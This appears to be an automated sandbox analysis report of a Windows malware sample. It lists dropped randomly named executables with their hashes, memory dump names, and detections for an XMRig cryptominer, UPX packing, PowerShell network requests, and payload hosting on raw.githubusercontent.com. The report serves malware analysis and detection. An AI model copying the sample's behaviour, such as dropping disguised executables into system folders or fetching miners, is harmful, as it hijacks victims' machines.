memory/2612-24-0x000007FEF658E000-0x000007FEF658F000-memory.dmp

memory/1740-22-0x0000000002E40000-0x0000000003232000-memory.dmp

\Windows\system\SoDOqkX.exe

MD5 ed4649f3820865bb19978357abc3aa2b
SHA1 1290bc39847fad8317bab55c1ff77b8ac76496e0
SHA256 f87dcea83a79cd9f72d7cb6edc5e77517b77f21520ade8fcdfb4f65a8cca683b
SHA512 1c5274f7b11777a0fc610e734c412f8a7ed4b1e8bb57c4551e852fc12847153c3e701d4bf3a0e41d536cf21683f547edfddced84bc661336e3ee0cc6039d4b90

\Windows\system\EobvnCR.exe

MD5 f562a3ce91511406d846e8097ac3d18f
SHA1 dbef9809046ab747e73f72b4777d84dcc70236db
SHA256 af2873d67794b192a08f28717ebd1febc34645d9102daf85898397999c68f31b
SHA512 337990ffc31830ca4c0cfb3c6d58a4e7f73a002325497494ec7de4d4d23d056ca0d8445468a824f37d25775a0c2e98bc8056b352ae61be48187c76f84f27e4a5

\Windows\system\bNxsgUL.exe

MD5 c9801eb32a404099b3deb17adedc9ebf
SHA1 12409cd8fcce79386833498d5c6e3939530212ac
SHA256 b88eae3803a7ac2e375d8e7c463d04a7d8fe09bad1865bc931b540c24b05a220
SHA512 01408aaa6f1ef80e191b06089e390eaa920b4d27899c6947d323051f5babc8fa1400da1e1e507a789d91f17e9f467ca180e92e88141243a8479dfdac1c5e0842

\Windows\system\JldVunT.exe

MD5 1b7adf6957e751a227224f43938f0182
SHA1 eb781115b55ccb7e7974fa323508884c4d615f67
SHA256 c988ca15d4ab38815c6f07054c91b0c82158b75681b6e4057d19d2f00408985d
SHA512 e2ffc5fdd75cf4d33dcc18a225818322372f4f179d1ba2ef3308b11bf290d6f400c93deb2cf5894467c560126f7c0a0c7a63a23699ce75c155108aecfddce01c

C:\Windows\system\PlitksV.exe

MD5 2c32321036aef39db2fdfa285f906607
SHA1 277b3732d9c91a1354c0f63252f8b2bb7940196e
SHA256 caf25ba6eaa406a9f594428dc0b249870a95ddd3746d2ee3e0a33b67936b8b8f
SHA512 a38e6ff33fc25156edeb3d1df749a93869ed497bb284d70bd5826e75f3689fa774a7d59b8ad7d44f04e7361f30300942dd5f7d5d508dc45662bb267b1b136631

C:\Windows\system\HNCQdKv.exe

MD5 c8ebf3c96fe33178ffb58e662efac772
SHA1 d6929ac7c2f384d52cc530119cf325a34963ee32
SHA256 1fc15e369ee0bdee1fe1cbc086e0bc824db3c1f4464cf62e85a856cbde68a717
SHA512 a71538db86d8d150ec2506735af7c2e155dc38de1e38b3d4d92ade29f0bb1c8336d2dc20fc065cf44f136eaf04e4ae56ee7c3115d3baab681f9c4a9072d5a85c

\Windows\system\PHdVjoa.exe

MD5 868152e4f38d79940aa7a9889b9b949b
SHA1 08f07ec8d97a2dfdffefcdf6176483f9fc7a7b0d
SHA256 60413741931c1c263282d25948046734af72cebd59815116825b6c103a865ea7
SHA512 1eda31ef0c6adcbbca80d6366b7beff6b5b9c02409ff31427055f96b41747c0979c891d78b168a61e79949ab0c1f29ba8905daa128b437161770b4ea888e4787

C:\Windows\system\mCFgOYK.exe

MD5 0f4ac3b015515ac885052af2e0387c92
SHA1 acabe2bf076e9dc91519424650260ec1388034f7
SHA256 66af9e87991a95a3c2f5557166dda1fef3b444d8f3878533b056cf12c620274d
SHA512 af50e90364d477f8b558aed16d3a09f503032015eaea51eda8209ed05d45f6708e456c88a8a80ac78469b1d010bf715b12c2a949571e2612d6e007491cfa2c8b

memory/1740-203-0x000000013F170000-0x000000013F562000-memory.dmp

C:\Windows\system\tvnfEeT.exe

MD5 d6a8a4214914d816138147a7e8baed19
SHA1 bdb38c96dce458f793d0922a4566fa4144088225
SHA256 e96d88624c298e9d9c3a6f354be6abcaf209983ee5c8f4f1937831323d0fccf1
SHA512 c1302781ba700ae69df4dadfda2f6cf8858dc06aefe3338c371712bbefbcf93b7bbefa64962c8e067f939c1150a3b404993b956e324f465b5b5d38fbd087043a

memory/2612-224-0x000000001B710000-0x000000001B9F2000-memory.dmp

memory/1740-194-0x000000013F0B0000-0x000000013F4A2000-memory.dmp

memory/2664-193-0x000000013FA30000-0x000000013FE22000-memory.dmp

memory/1740-192-0x0000000002E40000-0x0000000003232000-memory.dmp

memory/2716-191-0x000000013F4E0000-0x000000013F8D2000-memory.dmp

memory/2708-190-0x000000013F030000-0x000000013F422000-memory.dmp

memory/1740-189-0x0000000002E40000-0x0000000003232000-memory.dmp

memory/1740-188-0x000000013F030000-0x000000013F422000-memory.dmp

memory/2772-187-0x000000013F3D0000-0x000000013F7C2000-memory.dmp

memory/2804-186-0x000000013F400000-0x000000013F7F2000-memory.dmp

memory/2612-185-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

memory/1740-207-0x0000000002E40000-0x0000000003232000-memory.dmp

memory/2816-206-0x000000013F750000-0x000000013FB42000-memory.dmp

memory/2292-205-0x000000013F170000-0x000000013F562000-memory.dmp

memory/2592-204-0x000000013F880000-0x000000013FC72000-memory.dmp

memory/3064-202-0x000000013F390000-0x000000013F782000-memory.dmp

memory/1740-201-0x000000013F390000-0x000000013F782000-memory.dmp

memory/2640-200-0x000000013F0B0000-0x000000013F4A2000-memory.dmp

memory/1740-199-0x0000000002E40000-0x0000000003232000-memory.dmp

memory/2520-198-0x000000013F9D0000-0x000000013FDC2000-memory.dmp

memory/1740-197-0x0000000002E40000-0x0000000003232000-memory.dmp

C:\Windows\system\zrScSgw.exe

MD5 050ae7b397be3e9d16170992ab7099c1
SHA1 74940018003b038a425fa984023aa763cfd31a1f
SHA256 9f8fbf517b4ff449c346223ceefee007d463c0cdd4400cbc5963d7c0ec871153
SHA512 0600088d2e4a581700be8f263e737cc35fd8c5e8c82221d299f190def51a8133148a6cc2a984e771be70d447e173d86fbac7a0d68176148891161bde5a358003

C:\Windows\system\WAAuQix.exe

MD5 94d3c84ced34a5566928ad8690e58fa8
SHA1 2933eb68a39103994c55bfb0674ec4800d18b20c
SHA256 b6aa14968b6cf8076d10edb72af2bc35a64ba2a93e8a6ca547ad477508acbf4f
SHA512 673dcba985307d13e24b9edea12b23d5a766639747052c901c87a7073a50fbcfc1b414bffacf9d7f808196abdce127fabdead850c0bbce5091fc2a1ba516b58a

C:\Windows\system\buNRcRi.exe

MD5 e6b53837dd76ac4974d25fa3701996cb
SHA1 f1d33ad6eb63f52b7328fbe163011ef8913d2250
SHA256 fed27fc1224d55c7802264b8ece56f3e8b06e47c7f430ffb1b0f5bda39a79178
SHA512 c8bb6c0cebf7818e3820961e58e6bbab39565e0d17ae9ed18f0ec0268360fc1b49cee4d956fb72659babf69e376dee94d79874a82ebc2950c86c3943d24cbbdf

C:\Windows\system\TAbcggi.exe

MD5 1b6d3acddfee8362179f56f1d75b7d02
SHA1 5a9cd0cff9a9550d670c72c4c735bd76b2361ea3
SHA256 885df3e5f7eeeeb60ff16d0eabde4161e419dae1a5734159c674b2012569fc7d
SHA512 adf8baeeb67a5408257b317d440ff1ca7d08ebc29be9a151029885f44974c2c9685c44c9a85d6765dceda624939388a53f491730fa90f2db2a9328ba2b8dc944

\Windows\system\hnaNkWZ.exe

MD5 fc0a327f2c8ceae2d51a9f47a7fa5521
SHA1 6e91942a0e6de1a1118dcddb95ef60601a160e1f
SHA256 6a55f860d4be28b20089325b7be9ccb8aa3fdf9c663ab503fc84743b0fe4e606
SHA512 5c7f5461212b617becb5a5c304562b81043bec3256adaa4aa7b886c1adfcb97f7bb6008b207ed89f3f538e190be25bf95e0b35ab8df1c42d72d55db147e3ae8e

C:\Windows\system\OXnQvGR.exe

MD5 b34a18480e67e00cddd14a0b01619af1
SHA1 14fca98070d5f8fd2a7b5c7320a2ea7259ab3905
SHA256 44876f4436ca63ae10b82f517b7f5ccad2182d02eac5d119b16f16c257b7f272
SHA512 fa0b9ca6900c321054ff53a48b8beb45530a55661889ba606953d4fdd635f04e383ba61fe06df31d12c7c39d24d2966afc650193654533c9da636659427d1087

C:\Windows\system\eKTDLTy.exe

MD5 28e169f22a1ea1c152f8197e9e496cf9
SHA1 80f0bfd4afe9e554bbcce8f10bd47d4af34f40ff
SHA256 24c20488cebdb4c0559d09c9ddf0338a153f1283741f714dd3ea003733c04347
SHA512 30f101deef72b078f1f8b4565dac2e4ab8992b2e74b17b116d16ad0b3d5d07b2218a5294abc486b08cf93c32bd129d8a49d2266fbb51d500689d398ac0456061

C:\Windows\system\fXJHDAR.exe

MD5 5fafe11b6e25672967484b14ddd65dd3
SHA1 876a1ae11b742981c48df7b894c58fa2077b0a59
SHA256 98b81fe2b301adad4bc9ecdff241cb8e71bb02833f5dc445cc4abfc7d58dbe9c
SHA512 3ec8cf5847032e895cb571552bf67cfacf9a1ba7f3dadfa0085582cb1bc6f0f35d32006c51aed56deaa88b3b6f41bef9c30e4aa6f49413a9fca01d697549784d

C:\Windows\system\FEiUQlh.exe

MD5 df5304e661b7a5242df398a93fd8a43b
SHA1 8fceadc9753ec0d8725f01147d98e89aae63b8bc
SHA256 a6b8a7c0b1b5630624fa2625d8a24359d1d30e7e6ecede700a7b78d27a352792
SHA512 1d20a9ca0e34b004c94dfb7341496d3da3675cb613212ad5f7e0086fa76098e3bb426586fdfe2a85e5931d904ccdff09c6dfc70325a2a0c1578cdb69bdc6f3c2

C:\Windows\system\OpkkRaP.exe

MD5 d4d7f46008cf10b75e271784982f3d5f
SHA1 d8034eed3cc4e53ac6b0f1758e1246abab5a1752
SHA256 5b1af634e48de6f6e56582cbf508d73609c7d909d29c63ad2cdf803417eb1e03
SHA512 1551453e102322b58a7baf0fc23a11df3d0432d9093e823de4e06b24995a161d6c5117438a1a086bd741213cb0a4d7344c4eee41bfda0ecce9a8749cd8eb08ef

C:\Windows\system\BUYmGID.exe

MD5 8ff0330aa9038492fcb742b10738614b
SHA1 c0a48b298027633b6996d7c043d10fbe21091f57
SHA256 20bc898186230e236ac1716bae9e82b47e0e1c760ddff9c3cbd341f43d69dbac
SHA512 b0279ba7160fa621983a327af26db71d5b28fc7c1e6921d9df78e617e871de72e9ea46de48e2c23617f60a63fa7438e413af7f89c58caecf44384596663758b0

C:\Windows\system\MKwCmnV.exe

MD5 a065dc4b90b53849f4ba6f716b15f822
SHA1 dd50f0da81f593952c608643a13d6deec172c900
SHA256 1b18abacd9a5ba6f398ac92e02c91d2aa8e94347bee27784db78b32acdc4ba0d
SHA512 d0328bf823bc9717399aaea6e79e1416b4ae7c22b8764bf46c59f8ffdb82f46eed006fd3b65e43057f9c5ac8c0db0005264949de34ca4e65cfbc820c93c6f98b

C:\Windows\system\vJmUynQ.exe

MD5 bcfb5da502d7e33e727599c1c343cf1e
SHA1 4af7b457b73ed173f081283f3292225d06c764d5
SHA256 6a3d59b0c791ba3e585e54a6c510a7cd211a35fd97c9a6759b25914308b0554a
SHA512 042177c9e38cb880087deba9d2c4326e35a2baac1fe3c713341b0213609a418022ffe070cb836d896be80fcca49cd989dfc1daf3ff11a7235347903c2977ea7c

C:\Windows\system\eGygMIh.exe

MD5 a924f5a254ab2330dc5ebde4dc3ef3de
SHA1 cbea8b72d3049319536514ac0330c9d70286a1ed
SHA256 5ae583e24e06c71264b7ca86ea39f3c7a053f9c92b807c0c82998334c32e03bb
SHA512 de82595a0a825ab288d148634faeb81d25198cec0614272c1377245aba51e8a5b639181ab85de3f569dd81a730108d6599b97ed84a079ba5b9c75ca5e53de356

C:\Windows\system\uLPtcli.exe

MD5 a053afd36f42d5937012b8b34fd01dcd
SHA1 d08496415d34d36d17a769ede78b14e9f994be0e
SHA256 f31baa1e41c9b6989aeb35d4f53b0218cbeb7b2cfc99f6a231d4b0ed6fabd1ad
SHA512 867629d5f3da37fbdb3ddcf49dd6335e36ed882f6536ea975a8ad94c89d3ce589c08d1cf29fa663be5209a14ccf2b9c688c36f0ca84d9722fd2eb576be8dc932

C:\Windows\system\iRJBSpE.exe

MD5 60bcc814a18437789931f50e3bab1f19
SHA1 764d3b78450bfcb9d2a796e7c1e0f05e9d13e321
SHA256 83cb5c4e2a82c7a4b446edfc2cba6dbb0ea0449d95d57dae9be53a7533528cb1
SHA512 a653c6880dca2d17a50439b8096c96f6b1a46cd7069ec4840ec671791c199442e709997f2083c473ef4a41bd40bb9fd10305c647d182324bf73b243a555df0e5

C:\Windows\system\DvvkNjE.exe

MD5 fa25901203835d542519d965ab2896f3
SHA1 ac42e43b9af5b3359ba571deb9f188a02e5ededd
SHA256 51a376c435cb5025ec355f3e7fcf86ebb4c372a2e27e5dd414e0f48e31c8da81
SHA512 105ba59ffaafdaecdf44926161ae3fd1adad94e9fb5f2cb429ce691afa43c0f473da4d30a2a3aefe8d4ca1185ea9b2c411702e680f12a838e700c03aa9b0c90f

C:\Windows\system\bmcyMQk.exe

MD5 ab093c328352679b077dfe3d7436d854
SHA1 1d94f96639445accad889759b7cd3f391d6e2711
SHA256 6161a6b13a38c5b6e07aa7d660b6c3c89c58d1e22b4123971e9ab0fd04d0ad9e
SHA512 dade636194f40375951b845b9bd2ba2fb23f58cd1b6f0082776564c812fa53aeea8bc3d9365687e849777c8b01a07fd9f14e33cfad4b21db22ba4ef1c95b1f17

C:\Windows\system\DGpoDKQ.exe

MD5 f1d52db32dcaee0a1e27c93f9b0d0893
SHA1 ed336cc0ff2999a427bab0689bca4b0d8fe8f067
SHA256 a6066a818dc52c4628527e53af5799698f0420a57b657e824d02a45c6a636bbd
SHA512 d5e18016db8eba6383027f37df5a6e8180e7125103d05b6d95e2b8ab5b81fe53c5f6de73d5a66feacb65674dc24945b74e1f9917b9833c38ea7d16a90cc4b878

C:\Windows\system\EhsFdXx.exe

MD5 227286b7b1970d73034df80fde9421c5
SHA1 a37c8da24305cd481728f3a138d186891c443ff6
SHA256 c8ac444e5786bb37d68856f6f109c9a6c2441210d8d1345ab3ded910a460b554
SHA512 c5bad02c38676b4e3189c8b1e2e93723bcefc582d93f78a3bc11f30ece2308bb8b6830d44f86725f2ea02749ba2599459c8132de5531cf2c9afca248251203e2

C:\Windows\system\FGRYSFW.exe

MD5 d7bea69887bedee8def848d890ba4ed4
SHA1 98db54bf37759a360e6f3da2bc1fff233407a547
SHA256 6cb0322093ac2e2c3bfcf0f872985f25e2fe6f36c7b98fa8a1be0c810b617f50
SHA512 40371c8cefba835e636db35db2cb48e95119c1ca941e144eb5bdbf0706cdbcba9edd789c356a7b5485eb7f4278c8a35ea4492ef19f6164e6715124d95178d641

C:\Windows\system\nEmipTm.exe

MD5 cfb5cc31ded008d8cf93d9009641e55a
SHA1 10ea7916dfcff59ead38c99c84a8ba601b5d1128
SHA256 c50abda477dedf3913f4efacf92a7896671bb99ef5ff4538b308c2d095013417
SHA512 09de253cc832610586de06141491e34688afe3562f93eebcc0ad4991b2718b5eadf14b13a3985a1ba1538c8e2b153442ece7510d92d71b304bd3a2aac2d6d283

memory/1740-20-0x0000000002E40000-0x0000000003232000-memory.dmp

memory/1740-15-0x000000013F0A0000-0x000000013F492000-memory.dmp

memory/2612-227-0x0000000002030000-0x0000000002038000-memory.dmp

memory/2612-1432-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

memory/2520-5518-0x000000013F9D0000-0x000000013FDC2000-memory.dmp

memory/2640-5525-0x000000013F0B0000-0x000000013F4A2000-memory.dmp

memory/2592-5523-0x000000013F880000-0x000000013FC72000-memory.dmp

memory/2292-5522-0x000000013F170000-0x000000013F562000-memory.dmp

memory/3064-5528-0x000000013F390000-0x000000013F782000-memory.dmp

memory/2804-5533-0x000000013F400000-0x000000013F7F2000-memory.dmp

memory/2664-5532-0x000000013FA30000-0x000000013FE22000-memory.dmp

memory/2716-5539-0x000000013F4E0000-0x000000013F8D2000-memory.dmp

memory/2708-6628-0x000000013F030000-0x000000013F422000-memory.dmp

memory/2772-6658-0x000000013F3D0000-0x000000013F7C2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 18:01

Reported

2024-05-22 18:03

Platform

win10v2004-20240508-en

Max time kernel

126s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\pOmrvFO.exe N/A
N/A N/A C:\Windows\System\fxkcLyW.exe N/A
N/A N/A C:\Windows\System\VgnoeXt.exe N/A
N/A N/A C:\Windows\System\VyrkNAX.exe N/A
N/A N/A C:\Windows\System\mujUMzN.exe N/A
N/A N/A C:\Windows\System\dETUCKO.exe N/A
N/A N/A C:\Windows\System\rRWQTSv.exe N/A
N/A N/A C:\Windows\System\MEkVqFo.exe N/A
N/A N/A C:\Windows\System\MUqLiCQ.exe N/A
N/A N/A C:\Windows\System\LGUkPRp.exe N/A
N/A N/A C:\Windows\System\XSSFLtA.exe N/A
N/A N/A C:\Windows\System\gCIcbYL.exe N/A
N/A N/A C:\Windows\System\rrXYEWz.exe N/A
N/A N/A C:\Windows\System\qviublZ.exe N/A
N/A N/A C:\Windows\System\CzLKhql.exe N/A
N/A N/A C:\Windows\System\IrGSluo.exe N/A
N/A N/A C:\Windows\System\FISNCqh.exe N/A
N/A N/A C:\Windows\System\kDzfUCS.exe N/A
N/A N/A C:\Windows\System\uujohOn.exe N/A
N/A N/A C:\Windows\System\TnrmgkH.exe N/A
N/A N/A C:\Windows\System\XxAKPdU.exe N/A
N/A N/A C:\Windows\System\iWJoXbr.exe N/A
N/A N/A C:\Windows\System\eMohHmq.exe N/A
N/A N/A C:\Windows\System\xwaSKcI.exe N/A
N/A N/A C:\Windows\System\ctcPhQt.exe N/A
N/A N/A C:\Windows\System\ExYaxMn.exe N/A
N/A N/A C:\Windows\System\algRZeR.exe N/A
N/A N/A C:\Windows\System\OxfDWMk.exe N/A
N/A N/A C:\Windows\System\WOCpOMS.exe N/A
N/A N/A C:\Windows\System\vpwPBYq.exe N/A
N/A N/A C:\Windows\System\ckLjbln.exe N/A
N/A N/A C:\Windows\System\FLPpmxV.exe N/A
N/A N/A C:\Windows\System\fPOaFVG.exe N/A
N/A N/A C:\Windows\System\awKOqDm.exe N/A
N/A N/A C:\Windows\System\rZQUWaj.exe N/A
N/A N/A C:\Windows\System\eJBRUQe.exe N/A
N/A N/A C:\Windows\System\ZBmQVKi.exe N/A
N/A N/A C:\Windows\System\bolbXiY.exe N/A
N/A N/A C:\Windows\System\JWavdeb.exe N/A
N/A N/A C:\Windows\System\yJobRTi.exe N/A
N/A N/A C:\Windows\System\AWTFLrd.exe N/A
N/A N/A C:\Windows\System\SdvBATe.exe N/A
N/A N/A C:\Windows\System\oVWfjUm.exe N/A
N/A N/A C:\Windows\System\azaNCFu.exe N/A
N/A N/A C:\Windows\System\fEvvfNW.exe N/A
N/A N/A C:\Windows\System\VidWivK.exe N/A
N/A N/A C:\Windows\System\OgQUcFu.exe N/A
N/A N/A C:\Windows\System\sVdFfSU.exe N/A
N/A N/A C:\Windows\System\CODoCmR.exe N/A
N/A N/A C:\Windows\System\ihIxYlL.exe N/A
N/A N/A C:\Windows\System\GXoUYQi.exe N/A
N/A N/A C:\Windows\System\jUTEKnp.exe N/A
N/A N/A C:\Windows\System\PkWyFXR.exe N/A
N/A N/A C:\Windows\System\ucAfRPb.exe N/A
N/A N/A C:\Windows\System\aFcRUls.exe N/A
N/A N/A C:\Windows\System\ubfQCao.exe N/A
N/A N/A C:\Windows\System\gRhBScf.exe N/A
N/A N/A C:\Windows\System\nYkoaYX.exe N/A
N/A N/A C:\Windows\System\vXBPIrB.exe N/A
N/A N/A C:\Windows\System\JfJLUZb.exe N/A
N/A N/A C:\Windows\System\pNKXusl.exe N/A
N/A N/A C:\Windows\System\RDlQKTn.exe N/A
N/A N/A C:\Windows\System\eOPpPws.exe N/A
N/A N/A C:\Windows\System\aOwRRYw.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\kDzfUCS.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\rqJrfSg.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\spFBJnr.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ECrJRuD.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\hTdLyRf.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\XhTbYPP.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\VidWivK.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\btfQqvs.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ekHCVbX.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\bPIuiSs.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\PvFFSbl.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\tcjkCwl.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\XbQAonT.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\pOmrvFO.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\qaNDiBQ.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\dPbHIJd.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\puDajZa.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\DAzukWC.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\EdoZEyM.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\VgnoeXt.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\vpwPBYq.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\bFduXbW.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\KumnNZM.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\GKHltBd.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\rrXYEWz.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\JfJLUZb.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\umRxQTw.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\EpTWDUi.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\rtFACat.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\uqvyHEB.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\eOPpPws.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\VdtaerL.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\fLiRGNp.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\kqvcHOy.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ThFtlEG.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\pNKXusl.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\AzfUCBT.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\bFzsNqj.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\ZbLlAQS.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\sVdFfSU.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\FdYrSRC.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
File created C:\Windows\System\RwAFYio.exe C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe N/A
